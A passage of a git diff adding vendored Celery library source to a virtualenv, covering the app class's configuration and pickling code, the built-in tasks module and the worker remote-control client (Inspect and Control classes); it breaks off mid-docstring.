ignore_keys=self._preconf_set_by_auto, prefix=self.namespace, + ) + if self._conf is not None: + # replace in place, as someone may have referenced app.conf, + # done some changes, accessed a key, and then try to make more + # changes to the reference and not the finalized value. + self._conf.swap_with(settings) + else: + self._conf = settings + + # load lazy config dict initializers. + pending_def = self._pending_defaults + while pending_def: + self._conf.add_defaults(maybe_evaluate(pending_def.popleft()())) + + # load lazy periodic tasks + pending_beat = self._pending_periodic_tasks + while pending_beat: + periodic_task_args, periodic_task_kwargs = pending_beat.popleft() + self._add_periodic_task(*periodic_task_args, **periodic_task_kwargs) + + self.on_after_configure.send(sender=self, source=self._conf) + return self._conf + + def _after_fork(self): + self._pool = None + try: + self.__dict__['amqp']._producer_pool = None + except (AttributeError, KeyError): + pass + self.on_after_fork.send(sender=self) + + def signature(self, *args, **kwargs): + """Return a new :class:`~celery.Signature` bound to this app.""" + kwargs['app'] = self + return self._canvas.signature(*args, **kwargs) + + def add_periodic_task(self, schedule, sig, + args=(), kwargs=(), name=None, **opts): + """ + Add a periodic task to beat schedule. + + Celery beat store tasks based on `sig` or `name` if provided. Adding the + same signature twice make the second task override the first one. 
To + avoid the override, use distinct `name` for them. + """ + key, entry = self._sig_to_periodic_task_entry( + schedule, sig, args, kwargs, name, **opts) + if self.configured: + self._add_periodic_task(key, entry, name=name) + else: + self._pending_periodic_tasks.append([(key, entry), {"name": name}]) + return key + + def _sig_to_periodic_task_entry(self, schedule, sig, + args=(), kwargs=None, name=None, **opts): + kwargs = {} if not kwargs else kwargs + sig = (sig.clone(args, kwargs) + if isinstance(sig, abstract.CallableSignature) + else self.signature(sig.name, args, kwargs)) + return name or repr(sig), { + 'schedule': schedule, + 'task': sig.name, + 'args': sig.args, + 'kwargs': sig.kwargs, + 'options': dict(sig.options, **opts), + } + + def _add_periodic_task(self, key, entry, name=None): + if name is None and key in self._conf.beat_schedule: + logger.warning( + f"Periodic task key='{key}' shadowed a previous unnamed periodic task." + " Pass a name kwarg to add_periodic_task to silence this warning." + ) + + self._conf.beat_schedule[key] = entry + + def create_task_cls(self): + """Create a base task class bound to this app.""" + return self.subclass_with_self( + self.task_cls, name='Task', attribute='_app', + keep_reduce=True, abstract=True, + ) + + def subclass_with_self(self, Class, name=None, attribute='app', + reverse=None, keep_reduce=False, **kw): + """Subclass an app-compatible class. + + App-compatible means that the class has a class attribute that + provides the default app it should use, for example: + ``class Foo: app = None``. + + Arguments: + Class (type): The app-compatible class to subclass. + name (str): Custom name for the target class. + attribute (str): Name of the attribute holding the app, + Default is 'app'. + reverse (str): Reverse path to this object used for pickling + purposes. For example, to get ``app.AsyncResult``, + use ``"AsyncResult"``. + keep_reduce (bool): If enabled a custom ``__reduce__`` + implementation won't be provided. + """ + Class = symbol_by_name(Class) + reverse = reverse if reverse else Class.__name__ + + def __reduce__(self): + return _unpickle_appattr, (reverse, self.__reduce_args__()) + + attrs = dict( + {attribute: self}, + __module__=Class.__module__, + __doc__=Class.__doc__, + **kw) + if not keep_reduce: + attrs['__reduce__'] = __reduce__ + + return type(name or Class.__name__, (Class,), attrs) + + def _rgetattr(self, path): + return attrgetter(path)(self) + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + self.close() + + def __repr__(self): + return f'<{type(self).__name__} {appstr(self)}>' + + def __reduce__(self): + if self._using_v1_reduce: + return self.__reduce_v1__() + return (_unpickle_app_v2, (self.__class__, self.__reduce_keys__())) + + def __reduce_v1__(self): + # Reduce only pickles the configuration changes, + # so the default configuration doesn't have to be passed + # between processes. 
+ return ( + _unpickle_app, + (self.__class__, self.Pickler) + self.__reduce_args__(), + ) + + def __reduce_keys__(self): + """Keyword arguments used to reconstruct the object when unpickling.""" + return { + 'main': self.main, + 'changes': + self._conf.changes if self.configured else self._preconf, + 'loader': self.loader_cls, + 'backend': self.backend_cls, + 'amqp': self.amqp_cls, + 'events': self.events_cls, + 'log': self.log_cls, + 'control': self.control_cls, + 'fixups': self.fixups, + 'config_source': self._config_source, + 'task_cls': self.task_cls, + 'namespace': self.namespace, + } + + def __reduce_args__(self): + """Deprecated method, please use :meth:`__reduce_keys__` instead.""" + return (self.main, self._conf.changes if self.configured else {}, + self.loader_cls, self.backend_cls, self.amqp_cls, + self.events_cls, self.log_cls, self.control_cls, + False, self._config_source) + + @cached_property + def Worker(self): + """Worker application. + + See Also: + :class:`~@Worker`. + """ + return self.subclass_with_self('celery.apps.worker:Worker') + + @cached_property + def WorkController(self, **kwargs): + """Embeddable worker. + + See Also: + :class:`~@WorkController`. + """ + return self.subclass_with_self('celery.worker:WorkController') + + @cached_property + def Beat(self, **kwargs): + """:program:`celery beat` scheduler application. + + See Also: + :class:`~@Beat`. + """ + return self.subclass_with_self('celery.apps.beat:Beat') + + @cached_property + def Task(self): + """Base task class for this app.""" + return self.create_task_cls() + + @cached_property + def annotations(self): + return prepare_annotations(self.conf.task_annotations) + + @cached_property + def AsyncResult(self): + """Create new result instance. + + See Also: + :class:`celery.result.AsyncResult`. + """ + return self.subclass_with_self('celery.result:AsyncResult') + + @cached_property + def ResultSet(self): + return self.subclass_with_self('celery.result:ResultSet') + + @cached_property + def GroupResult(self): + """Create new group result instance. + + See Also: + :class:`celery.result.GroupResult`. + """ + return self.subclass_with_self('celery.result:GroupResult') + + @property + def pool(self): + """Broker connection pool: :class:`~@pool`. + + Note: + This attribute is not related to the workers concurrency pool. + """ + if self._pool is None: + self._ensure_after_fork() + limit = self.conf.broker_pool_limit + pools.set_limit(limit) + self._pool = pools.connections[self.connection_for_write()] + return self._pool + + @property + def current_task(self): + """Instance of task being executed, or :const:`None`.""" + return _task_stack.top + + @property + def current_worker_task(self): + """The task currently being executed by a worker or :const:`None`. + + Differs from :data:`current_task` in that it's not affected + by tasks calling other tasks directly, or eagerly. + """ + return get_current_worker_task() + + @cached_property + def oid(self): + """Universally unique identifier for this app.""" + # since 4.0: thread.get_ident() is not included when + # generating the process id. This is due to how the RPC + # backend now dedicates a single thread to receive results, + # which would not work if each thread has a separate id. 
+ return oid_from(self, threads=False) + + @property + def thread_oid(self): + """Per-thread unique identifier for this app.""" + try: + return self._local.oid + except AttributeError: + self._local.oid = new_oid = oid_from(self, threads=True) + return new_oid + + @cached_property + def amqp(self): + """AMQP related functionality: :class:`~@amqp`.""" + return instantiate(self.amqp_cls, app=self) + + @property + def _backend(self): + """A reference to the backend object + + Uses self._backend_cache if it is thread safe. + Otherwise, use self._local + """ + if self._backend_cache is not None: + return self._backend_cache + return getattr(self._local, "backend", None) + + @_backend.setter + def _backend(self, backend): + """Set the backend object on the app""" + if backend.thread_safe: + self._backend_cache = backend + else: + self._local.backend = backend + + @property + def backend(self): + """Current backend instance.""" + if self._backend is None: + self._backend = self._get_backend() + return self._backend + + @property + def conf(self): + """Current configuration.""" + if self._conf is None: + self._conf = self._load_config() + return self._conf + + @conf.setter + def conf(self, d): + self._conf = d + + @cached_property + def control(self): + """Remote control: :class:`~@control`.""" + return instantiate(self.control_cls, app=self) + + @cached_property + def events(self): + """Consuming and sending events: :class:`~@events`.""" + return instantiate(self.events_cls, app=self) + + @cached_property + def loader(self): + """Current loader instance.""" + return get_loader_cls(self.loader_cls)(app=self) + + @cached_property + def log(self): + """Logging: :class:`~@log`.""" + return instantiate(self.log_cls, app=self) + + @cached_property + def _canvas(self): + from celery import canvas + return canvas + + @cached_property + def tasks(self): + """Task registry. + + Warning: + Accessing this attribute will also auto-finalize the app. + """ + self.finalize(auto=True) + return self._tasks + + @property + def producer_pool(self): + return self.amqp.producer_pool + + def uses_utc_timezone(self): + """Check if the application uses the UTC timezone.""" + return self.timezone == timezone.utc + + @cached_property + def timezone(self): + """Current timezone for this app. + + This is a cached property taking the time zone from the + :setting:`timezone` setting. + """ + conf = self.conf + if not conf.timezone: + if conf.enable_utc: + return timezone.utc + else: + return timezone.local + return timezone.get_timezone(conf.timezone) + + +App = Celery # XXX compat diff --git a/env/Lib/site-packages/celery/app/builtins.py b/env/Lib/site-packages/celery/app/builtins.py new file mode 100644 index 00000000..1a79c409 --- /dev/null +++ b/env/Lib/site-packages/celery/app/builtins.py @@ -0,0 +1,187 @@ +"""Built-in Tasks. + +The built-in tasks are always available in all app instances. +""" +from celery._state import connect_on_app_finalize +from celery.utils.log import get_logger + +__all__ = () +logger = get_logger(__name__) + + +@connect_on_app_finalize +def add_backend_cleanup_task(app): + """Task used to clean up expired results. + + If the configured backend requires periodic cleanup this task is also + automatically configured to run every day at 4am (requires + :program:`celery beat` to be running). 
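+
+    Example:
+        For illustration, once the app is finalized the task can also be
+        sent manually from the registry:
+
+        >>> res = app.tasks['celery.backend_cleanup'].delay()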
+ """ + @app.task(name='celery.backend_cleanup', shared=False, lazy=False) + def backend_cleanup(): + app.backend.cleanup() + return backend_cleanup + + +@connect_on_app_finalize +def add_accumulate_task(app): + """Task used by Task.replace when replacing task with group.""" + @app.task(bind=True, name='celery.accumulate', shared=False, lazy=False) + def accumulate(self, *args, **kwargs): + index = kwargs.get('index') + return args[index] if index is not None else args + return accumulate + + +@connect_on_app_finalize +def add_unlock_chord_task(app): + """Task used by result backends without native chord support. + + Will joins chord by creating a task chain polling the header + for completion. + """ + from celery.canvas import maybe_signature + from celery.exceptions import ChordError + from celery.result import allow_join_result, result_from_tuple + + @app.task(name='celery.chord_unlock', max_retries=None, shared=False, + default_retry_delay=app.conf.result_chord_retry_interval, ignore_result=True, lazy=False, bind=True) + def unlock_chord(self, group_id, callback, interval=None, + max_retries=None, result=None, + Result=app.AsyncResult, GroupResult=app.GroupResult, + result_from_tuple=result_from_tuple, **kwargs): + if interval is None: + interval = self.default_retry_delay + + # check if the task group is ready, and if so apply the callback. + callback = maybe_signature(callback, app) + deps = GroupResult( + group_id, + [result_from_tuple(r, app=app) for r in result], + app=app, + ) + j = deps.join_native if deps.supports_native_join else deps.join + + try: + ready = deps.ready() + except Exception as exc: + raise self.retry( + exc=exc, countdown=interval, max_retries=max_retries, + ) + else: + if not ready: + raise self.retry(countdown=interval, max_retries=max_retries) + + callback = maybe_signature(callback, app=app) + try: + with allow_join_result(): + ret = j( + timeout=app.conf.result_chord_join_timeout, + propagate=True, + ) + except Exception as exc: # pylint: disable=broad-except + try: + culprit = next(deps._failed_join_report()) + reason = f'Dependency {culprit.id} raised {exc!r}' + except StopIteration: + reason = repr(exc) + logger.exception('Chord %r raised: %r', group_id, exc) + app.backend.chord_error_from_stack(callback, ChordError(reason)) + else: + try: + callback.delay(ret) + except Exception as exc: # pylint: disable=broad-except + logger.exception('Chord %r raised: %r', group_id, exc) + app.backend.chord_error_from_stack( + callback, + exc=ChordError(f'Callback error: {exc!r}'), + ) + return unlock_chord + + +@connect_on_app_finalize +def add_map_task(app): + from celery.canvas import signature + + @app.task(name='celery.map', shared=False, lazy=False) + def xmap(task, it): + task = signature(task, app=app).type + return [task(item) for item in it] + return xmap + + +@connect_on_app_finalize +def add_starmap_task(app): + from celery.canvas import signature + + @app.task(name='celery.starmap', shared=False, lazy=False) + def xstarmap(task, it): + task = signature(task, app=app).type + return [task(*item) for item in it] + return xstarmap + + +@connect_on_app_finalize +def add_chunk_task(app): + from celery.canvas import chunks as _chunks + + @app.task(name='celery.chunks', shared=False, lazy=False) + def chunks(task, it, n): + return _chunks.apply_chunks(task, it, n) + return chunks + + +@connect_on_app_finalize +def add_group_task(app): + """No longer used, but here for backwards compatibility.""" + from celery.canvas import maybe_signature + from celery.result 
import result_from_tuple + + @app.task(name='celery.group', bind=True, shared=False, lazy=False) + def group(self, tasks, result, group_id, partial_args, add_to_parent=True): + app = self.app + result = result_from_tuple(result, app) + # any partial args are added to all tasks in the group + taskit = (maybe_signature(task, app=app).clone(partial_args) + for i, task in enumerate(tasks)) + with app.producer_or_acquire() as producer: + [stask.apply_async(group_id=group_id, producer=producer, + add_to_parent=False) for stask in taskit] + parent = app.current_worker_task + if add_to_parent and parent: + parent.add_trail(result) + return result + return group + + +@connect_on_app_finalize +def add_chain_task(app): + """No longer used, but here for backwards compatibility.""" + @app.task(name='celery.chain', shared=False, lazy=False) + def chain(*args, **kwargs): + raise NotImplementedError('chain is not a real task') + return chain + + +@connect_on_app_finalize +def add_chord_task(app): + """No longer used, but here for backwards compatibility.""" + from celery import chord as _chord + from celery import group + from celery.canvas import maybe_signature + + @app.task(name='celery.chord', bind=True, ignore_result=False, + shared=False, lazy=False) + def chord(self, header, body, partial_args=(), interval=None, + countdown=1, max_retries=None, eager=False, **kwargs): + app = self.app + # - convert back to group if serialized + tasks = header.tasks if isinstance(header, group) else header + header = group([ + maybe_signature(s, app=app) for s in tasks + ], app=self.app) + body = maybe_signature(body, app=app) + ch = _chord(header, body) + return ch.run(header, body, partial_args, app, interval, + countdown, max_retries, **kwargs) + return chord diff --git a/env/Lib/site-packages/celery/app/control.py b/env/Lib/site-packages/celery/app/control.py new file mode 100644 index 00000000..52763e8a --- /dev/null +++ b/env/Lib/site-packages/celery/app/control.py @@ -0,0 +1,779 @@ +"""Worker Remote Control Client. + +Client for worker remote control commands. +Server implementation is in :mod:`celery.worker.control`. +There are two types of remote control commands: + +* Inspect commands: Does not have side effects, will usually just return some value + found in the worker, like the list of currently registered tasks, the list of active tasks, etc. + Commands are accessible via :class:`Inspect` class. + +* Control commands: Performs side effects, like adding a new queue to consume from. + Commands are accessible via :class:`Control` class. +""" +import warnings + +from billiard.common import TERM_SIGNAME +from kombu.matcher import match +from kombu.pidbox import Mailbox +from kombu.utils.compat import register_after_fork +from kombu.utils.functional import lazy +from kombu.utils.objects import cached_property + +from celery.exceptions import DuplicateNodenameWarning +from celery.utils.log import get_logger +from celery.utils.text import pluralize + +__all__ = ('Inspect', 'Control', 'flatten_reply') + +logger = get_logger(__name__) + +W_DUPNODE = """\ +Received multiple replies from node {0}: {1}. +Please make sure you give each node a unique nodename using +the celery worker `-n` option.\ +""" + + +def flatten_reply(reply): + """Flatten node replies. 
+ + Convert from a list of replies in this format:: + + [{'a@example.com': reply}, + {'b@example.com': reply}] + + into this format:: + + {'a@example.com': reply, + 'b@example.com': reply} + """ + nodes, dupes = {}, set() + for item in reply: + [dupes.add(name) for name in item if name in nodes] + nodes.update(item) + if dupes: + warnings.warn(DuplicateNodenameWarning( + W_DUPNODE.format( + pluralize(len(dupes), 'name'), ', '.join(sorted(dupes)), + ), + )) + return nodes + + +def _after_fork_cleanup_control(control): + try: + control._after_fork() + except Exception as exc: # pylint: disable=broad-except + logger.info('after fork raised exception: %r', exc, exc_info=1) + + +class Inspect: + """API for inspecting workers. + + This class provides proxy for accessing Inspect API of workers. The API is + defined in :py:mod:`celery.worker.control` + """ + + app = None + + def __init__(self, destination=None, timeout=1.0, callback=None, + connection=None, app=None, limit=None, pattern=None, + matcher=None): + self.app = app or self.app + self.destination = destination + self.timeout = timeout + self.callback = callback + self.connection = connection + self.limit = limit + self.pattern = pattern + self.matcher = matcher + + def _prepare(self, reply): + if reply: + by_node = flatten_reply(reply) + if (self.destination and + not isinstance(self.destination, (list, tuple))): + return by_node.get(self.destination) + if self.pattern: + pattern = self.pattern + matcher = self.matcher + return {node: reply for node, reply in by_node.items() + if match(node, pattern, matcher)} + return by_node + + def _request(self, command, **kwargs): + return self._prepare(self.app.control.broadcast( + command, + arguments=kwargs, + destination=self.destination, + callback=self.callback, + connection=self.connection, + limit=self.limit, + timeout=self.timeout, reply=True, + pattern=self.pattern, matcher=self.matcher, + )) + + def report(self): + """Return human readable report for each worker. + + Returns: + Dict: Dictionary ``{HOSTNAME: {'ok': REPORT_STRING}}``. + """ + return self._request('report') + + def clock(self): + """Get the Clock value on workers. + + >>> app.control.inspect().clock() + {'celery@node1': {'clock': 12}} + + Returns: + Dict: Dictionary ``{HOSTNAME: CLOCK_VALUE}``. + """ + return self._request('clock') + + def active(self, safe=None): + """Return list of tasks currently executed by workers. + + Arguments: + safe (Boolean): Set to True to disable deserialization. + + Returns: + Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``. + + See Also: + For ``TASK_INFO`` details see :func:`query_task` return value. + + """ + return self._request('active', safe=safe) + + def scheduled(self, safe=None): + """Return list of scheduled tasks with details. + + Returns: + Dict: Dictionary ``{HOSTNAME: [TASK_SCHEDULED_INFO,...]}``. + + Here is the list of ``TASK_SCHEDULED_INFO`` fields: + + * ``eta`` - scheduled time for task execution as string in ISO 8601 format + * ``priority`` - priority of the task + * ``request`` - field containing ``TASK_INFO`` value. + + See Also: + For more details about ``TASK_INFO`` see :func:`query_task` return value. + """ + return self._request('scheduled') + + def reserved(self, safe=None): + """Return list of currently reserved tasks, not including scheduled/active. + + Returns: + Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``. + + See Also: + For ``TASK_INFO`` details see :func:`query_task` return value. 
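+
+        Example:
+            Illustrative reply from a single idle node:
+
+            >>> app.control.inspect().reserved()
+            {'celery@node1': []}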
+ """ + return self._request('reserved') + + def stats(self): + """Return statistics of worker. + + Returns: + Dict: Dictionary ``{HOSTNAME: STAT_INFO}``. + + Here is the list of ``STAT_INFO`` fields: + + * ``broker`` - Section for broker information. + * ``connect_timeout`` - Timeout in seconds (int/float) for establishing a new connection. + * ``heartbeat`` - Current heartbeat value (set by client). + * ``hostname`` - Node name of the remote broker. + * ``insist`` - No longer used. + * ``login_method`` - Login method used to connect to the broker. + * ``port`` - Port of the remote broker. + * ``ssl`` - SSL enabled/disabled. + * ``transport`` - Name of transport used (e.g., amqp or redis) + * ``transport_options`` - Options passed to transport. + * ``uri_prefix`` - Some transports expects the host name to be a URL. + E.g. ``redis+socket:///tmp/redis.sock``. + In this example the URI-prefix will be redis. + * ``userid`` - User id used to connect to the broker with. + * ``virtual_host`` - Virtual host used. + * ``clock`` - Value of the workers logical clock. This is a positive integer + and should be increasing every time you receive statistics. + * ``uptime`` - Numbers of seconds since the worker controller was started + * ``pid`` - Process id of the worker instance (Main process). + * ``pool`` - Pool-specific section. + * ``max-concurrency`` - Max number of processes/threads/green threads. + * ``max-tasks-per-child`` - Max number of tasks a thread may execute before being recycled. + * ``processes`` - List of PIDs (or thread-id’s). + * ``put-guarded-by-semaphore`` - Internal + * ``timeouts`` - Default values for time limits. + * ``writes`` - Specific to the prefork pool, this shows the distribution + of writes to each process in the pool when using async I/O. + * ``prefetch_count`` - Current prefetch count value for the task consumer. + * ``rusage`` - System usage statistics. The fields available may be different on your platform. + From :manpage:`getrusage(2)`: + + * ``stime`` - Time spent in operating system code on behalf of this process. + * ``utime`` - Time spent executing user instructions. + * ``maxrss`` - The maximum resident size used by this process (in kilobytes). + * ``idrss`` - Amount of non-shared memory used for data (in kilobytes times + ticks of execution) + * ``isrss`` - Amount of non-shared memory used for stack space + (in kilobytes times ticks of execution) + * ``ixrss`` - Amount of memory shared with other processes + (in kilobytes times ticks of execution). + * ``inblock`` - Number of times the file system had to read from the disk + on behalf of this process. + * ``oublock`` - Number of times the file system has to write to disk + on behalf of this process. + * ``majflt`` - Number of page faults that were serviced by doing I/O. + * ``minflt`` - Number of page faults that were serviced without doing I/O. + * ``msgrcv`` - Number of IPC messages received. + * ``msgsnd`` - Number of IPC messages sent. + * ``nvcsw`` - Number of times this process voluntarily invoked a context switch. + * ``nivcsw`` - Number of times an involuntary context switch took place. + * ``nsignals`` - Number of signals received. + * ``nswap`` - The number of times this process was swapped entirely + out of memory. + * ``total`` - Map of task names and the total number of tasks with that type + the worker has accepted since start-up. + """ + return self._request('stats') + + def revoked(self): + """Return list of revoked tasks. 
+ + >>> app.control.inspect().revoked() + {'celery@node1': ['16f527de-1c72-47a6-b477-c472b92fef7a']} + + Returns: + Dict: Dictionary ``{HOSTNAME: [TASK_ID, ...]}``. + """ + return self._request('revoked') + + def registered(self, *taskinfoitems): + """Return all registered tasks per worker. + + >>> app.control.inspect().registered() + {'celery@node1': ['task1', 'task1']} + >>> app.control.inspect().registered('serializer', 'max_retries') + {'celery@node1': ['task_foo [serializer=json max_retries=3]', 'tasb_bar [serializer=json max_retries=3]']} + + Arguments: + taskinfoitems (Sequence[str]): List of :class:`~celery.app.task.Task` + attributes to include. + + Returns: + Dict: Dictionary ``{HOSTNAME: [TASK1_INFO, ...]}``. + """ + return self._request('registered', taskinfoitems=taskinfoitems) + registered_tasks = registered + + def ping(self, destination=None): + """Ping all (or specific) workers. + + >>> app.control.inspect().ping() + {'celery@node1': {'ok': 'pong'}, 'celery@node2': {'ok': 'pong'}} + >>> app.control.inspect().ping(destination=['celery@node1']) + {'celery@node1': {'ok': 'pong'}} + + Arguments: + destination (List): If set, a list of the hosts to send the + command to, when empty broadcast to all workers. + + Returns: + Dict: Dictionary ``{HOSTNAME: {'ok': 'pong'}}``. + + See Also: + :meth:`broadcast` for supported keyword arguments. + """ + if destination: + self.destination = destination + return self._request('ping') + + def active_queues(self): + """Return information about queues from which worker consumes tasks. + + Returns: + Dict: Dictionary ``{HOSTNAME: [QUEUE_INFO, QUEUE_INFO,...]}``. + + Here is the list of ``QUEUE_INFO`` fields: + + * ``name`` + * ``exchange`` + * ``name`` + * ``type`` + * ``arguments`` + * ``durable`` + * ``passive`` + * ``auto_delete`` + * ``delivery_mode`` + * ``no_declare`` + * ``routing_key`` + * ``queue_arguments`` + * ``binding_arguments`` + * ``consumer_arguments`` + * ``durable`` + * ``exclusive`` + * ``auto_delete`` + * ``no_ack`` + * ``alias`` + * ``bindings`` + * ``no_declare`` + * ``expires`` + * ``message_ttl`` + * ``max_length`` + * ``max_length_bytes`` + * ``max_priority`` + + See Also: + See the RabbitMQ/AMQP documentation for more details about + ``queue_info`` fields. + Note: + The ``queue_info`` fields are RabbitMQ/AMQP oriented. + Not all fields applies for other transports. + """ + return self._request('active_queues') + + def query_task(self, *ids): + """Return detail of tasks currently executed by workers. + + Arguments: + *ids (str): IDs of tasks to be queried. + + Returns: + Dict: Dictionary ``{HOSTNAME: {TASK_ID: [STATE, TASK_INFO]}}``. + + Here is the list of ``TASK_INFO`` fields: + * ``id`` - ID of the task + * ``name`` - Name of the task + * ``args`` - Positinal arguments passed to the task + * ``kwargs`` - Keyword arguments passed to the task + * ``type`` - Type of the task + * ``hostname`` - Hostname of the worker processing the task + * ``time_start`` - Time of processing start + * ``acknowledged`` - True when task was acknowledged to broker + * ``delivery_info`` - Dictionary containing delivery information + * ``exchange`` - Name of exchange where task was published + * ``routing_key`` - Routing key used when task was published + * ``priority`` - Priority used when task was published + * ``redelivered`` - True if the task was redelivered + * ``worker_pid`` - PID of worker processin the task + + """ + # signature used be unary: query_task(ids=[id1, id2]) + # we need this to preserve backward compatibility. 
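+        # For illustration, both call styles are accepted and normalized here:
+        #   inspect().query_task('id1', 'id2')     # star-args style
+        #   inspect().query_task(['id1', 'id2'])   # old unary style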
+ if len(ids) == 1 and isinstance(ids[0], (list, tuple)): + ids = ids[0] + return self._request('query_task', ids=ids) + + def conf(self, with_defaults=False): + """Return configuration of each worker. + + Arguments: + with_defaults (bool): if set to True, method returns also + configuration options with default values. + + Returns: + Dict: Dictionary ``{HOSTNAME: WORKER_CONFIGURATION}``. + + See Also: + ``WORKER_CONFIGURATION`` is a dictionary containing current configuration options. + See :ref:`configuration` for possible values. + """ + return self._request('conf', with_defaults=with_defaults) + + def hello(self, from_node, revoked=None): + return self._request('hello', from_node=from_node, revoked=revoked) + + def memsample(self): + """Return sample current RSS memory usage. + + Note: + Requires the psutils library. + """ + return self._request('memsample') + + def memdump(self, samples=10): + """Dump statistics of previous memsample requests. + + Note: + Requires the psutils library. + """ + return self._request('memdump', samples=samples) + + def objgraph(self, type='Request', n=200, max_depth=10): + """Create graph of uncollected objects (memory-leak debugging). + + Arguments: + n (int): Max number of objects to graph. + max_depth (int): Traverse at most n levels deep. + type (str): Name of object to graph. Default is ``"Request"``. + + Returns: + Dict: Dictionary ``{'filename': FILENAME}`` + + Note: + Requires the objgraph library. + """ + return self._request('objgraph', num=n, max_depth=max_depth, type=type) + + +class Control: + """Worker remote control client.""" + + Mailbox = Mailbox + + def __init__(self, app=None): + self.app = app + self.mailbox = self.Mailbox( + app.conf.control_exchange, + type='fanout', + accept=app.conf.accept_content, + serializer=app.conf.task_serializer, + producer_pool=lazy(lambda: self.app.amqp.producer_pool), + queue_ttl=app.conf.control_queue_ttl, + reply_queue_ttl=app.conf.control_queue_ttl, + queue_expires=app.conf.control_queue_expires, + reply_queue_expires=app.conf.control_queue_expires, + ) + register_after_fork(self, _after_fork_cleanup_control) + + def _after_fork(self): + del self.mailbox.producer_pool + + @cached_property + def inspect(self): + """Create new :class:`Inspect` instance.""" + return self.app.subclass_with_self(Inspect, reverse='control.inspect') + + def purge(self, connection=None): + """Discard all waiting tasks. + + This will ignore all tasks waiting for execution, and they will + be deleted from the messaging server. + + Arguments: + connection (kombu.Connection): Optional specific connection + instance to use. If not provided a connection will + be acquired from the connection pool. + + Returns: + int: the number of tasks discarded. + """ + with self.app.connection_or_acquire(connection) as conn: + return self.app.amqp.TaskConsumer(conn).purge() + discard_all = purge + + def election(self, id, topic, action=None, connection=None): + self.broadcast( + 'election', connection=connection, destination=None, + arguments={ + 'id': id, 'topic': topic, 'action': action, + }, + ) + + def revoke(self, task_id, destination=None, terminate=False, + signal=TERM_SIGNAME, **kwargs): + """Tell all (or specific) workers to revoke a task by id (or list of ids). + + If a task is revoked, the workers will ignore the task and + not execute it after all. + + Arguments: + task_id (Union(str, list)): Id of the task to revoke + (or list of ids). + terminate (bool): Also terminate the process currently working + on the task (if any). 
+ signal (str): Name of signal to send to process if terminate. + Default is TERM. + + See Also: + :meth:`broadcast` for supported keyword arguments. + """ + return self.broadcast('revoke', destination=destination, arguments={ + 'task_id': task_id, + 'terminate': terminate, + 'signal': signal, + }, **kwargs) + + def revoke_by_stamped_headers(self, headers, destination=None, terminate=False, + signal=TERM_SIGNAME, **kwargs): + """ + Tell all (or specific) workers to revoke a task by headers. + + If a task is revoked, the workers will ignore the task and + not execute it after all. + + Arguments: + headers (dict[str, Union(str, list)]): Headers to match when revoking tasks. + terminate (bool): Also terminate the process currently working + on the task (if any). + signal (str): Name of signal to send to process if terminate. + Default is TERM. + + See Also: + :meth:`broadcast` for supported keyword arguments. + """ + result = self.broadcast('revoke_by_stamped_headers', destination=destination, arguments={ + 'headers': headers, + 'terminate': terminate, + 'signal': signal, + }, **kwargs) + + task_ids = set() + if result: + for host in result: + for response in host.values(): + task_ids.update(response['ok']) + + if task_ids: + return self.revoke(list(task_ids), destination=destination, terminate=terminate, signal=signal, **kwargs) + else: + return result + + def terminate(self, task_id, + destination=None, signal=TERM_SIGNAME, **kwargs): + """Tell all (or specific) workers to terminate a task by id (or list of ids). + + See Also: + This is just a shortcut to :meth:`revoke` with the terminate + argument enabled. + """ + return self.revoke( + task_id, + destination=destination, terminate=True, signal=signal, **kwargs) + + def ping(self, destination=None, timeout=1.0, **kwargs): + """Ping all (or specific) workers. + + >>> app.control.ping() + [{'celery@node1': {'ok': 'pong'}}, {'celery@node2': {'ok': 'pong'}}] + >>> app.control.ping(destination=['celery@node2']) + [{'celery@node2': {'ok': 'pong'}}] + + Returns: + List[Dict]: List of ``{HOSTNAME: {'ok': 'pong'}}`` dictionaries. + + See Also: + :meth:`broadcast` for supported keyword arguments. + """ + return self.broadcast( + 'ping', reply=True, arguments={}, destination=destination, + timeout=timeout, **kwargs) + + def rate_limit(self, task_name, rate_limit, destination=None, **kwargs): + """Tell workers to set a new rate limit for task by type. + + Arguments: + task_name (str): Name of task to change rate limit for. + rate_limit (int, str): The rate limit as tasks per second, + or a rate limit string (`'100/m'`, etc. + see :attr:`celery.app.task.Task.rate_limit` for + more information). + + See Also: + :meth:`broadcast` for supported keyword arguments. + """ + return self.broadcast( + 'rate_limit', + destination=destination, + arguments={ + 'task_name': task_name, + 'rate_limit': rate_limit, + }, + **kwargs) + + def add_consumer(self, queue, + exchange=None, exchange_type='direct', routing_key=None, + options=None, destination=None, **kwargs): + """Tell all (or specific) workers to start consuming from a new queue. + + Only the queue name is required as if only the queue is specified + then the exchange/routing key will be set to the same name ( + like automatic queues do). + + Note: + This command does not respect the default queue/exchange + options in the configuration. + + Arguments: + queue (str): Name of queue to start consuming from. + exchange (str): Optional name of exchange. 
+ exchange_type (str): Type of exchange (defaults to 'direct') + command to, when empty broadcast to all workers. + routing_key (str): Optional routing key. + options (Dict): Additional options as supported + by :meth:`kombu.entity.Queue.from_dict`. + + See Also: + :meth:`broadcast` for supported keyword arguments. + """ + return self.broadcast( + 'add_consumer', + destination=destination, + arguments=dict({ + 'queue': queue, + 'exchange': exchange, + 'exchange_type': exchange_type, + 'routing_key': routing_key, + }, **options or {}), + **kwargs + ) + + def cancel_consumer(self, queue, destination=None, **kwargs): + """Tell all (or specific) workers to stop consuming from ``queue``. + + See Also: + Supports the same arguments as :meth:`broadcast`. + """ + return self.broadcast( + 'cancel_consumer', destination=destination, + arguments={'queue': queue}, **kwargs) + + def time_limit(self, task_name, soft=None, hard=None, + destination=None, **kwargs): + """Tell workers to set time limits for a task by type. + + Arguments: + task_name (str): Name of task to change time limits for. + soft (float): New soft time limit (in seconds). + hard (float): New hard time limit (in seconds). + **kwargs (Any): arguments passed on to :meth:`broadcast`. + """ + return self.broadcast( + 'time_limit', + arguments={ + 'task_name': task_name, + 'hard': hard, + 'soft': soft, + }, + destination=destination, + **kwargs) + + def enable_events(self, destination=None, **kwargs): + """Tell all (or specific) workers to enable events. + + See Also: + Supports the same arguments as :meth:`broadcast`. + """ + return self.broadcast( + 'enable_events', arguments={}, destination=destination, **kwargs) + + def disable_events(self, destination=None, **kwargs): + """Tell all (or specific) workers to disable events. + + See Also: + Supports the same arguments as :meth:`broadcast`. + """ + return self.broadcast( + 'disable_events', arguments={}, destination=destination, **kwargs) + + def pool_grow(self, n=1, destination=None, **kwargs): + """Tell all (or specific) workers to grow the pool by ``n``. + + See Also: + Supports the 